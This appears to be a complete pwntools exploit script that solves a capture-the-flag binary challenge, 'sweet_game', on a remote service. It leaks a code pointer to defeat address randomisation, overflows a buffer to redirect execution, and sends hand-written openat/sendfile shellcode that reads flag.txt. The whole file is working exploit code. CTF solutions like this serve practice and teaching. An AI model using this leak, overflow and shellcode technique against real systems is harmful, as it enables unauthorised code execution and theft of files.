#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./sweet_game", checksec=False)
# r = process()
r = remote("challenge.bugpwn.com", 1001)

offset = 48

# leak
buf = b"A"*66
r.sendafter(b": ", buf)
r.recvuntil(b"A"*66)
main = u64(r.recv(6).ljust(8, b"\x00"))
log.info("main: 0x%lx", main)
elf_base = main - 0x15bc
log.info("elf_base: 0x%lx", elf_base)
call_shellcode = elf_base + 0x16d2
log.info("call_shellcode: 0x%lx", call_shellcode)

# jump
buf = b"A"*offset
buf += p64(call_shellcode)
r.sendlineafter(b": ", buf)

# openat + sendfile
shellcode="""
lea rsi, [rdx+38]
mov edi, -100
xor rdx, rdx
xor r10, r10
add ax, 257
syscall
xor rsi, rsi
mov rsi, rax
mov al, 40
shr edi, 255
add r10b, 255
syscall
"""
shellcode = asm(shellcode)
shellcode += b"flag.txt\0"
r.sendlineafter(b": ", shellcode)

r.interactive()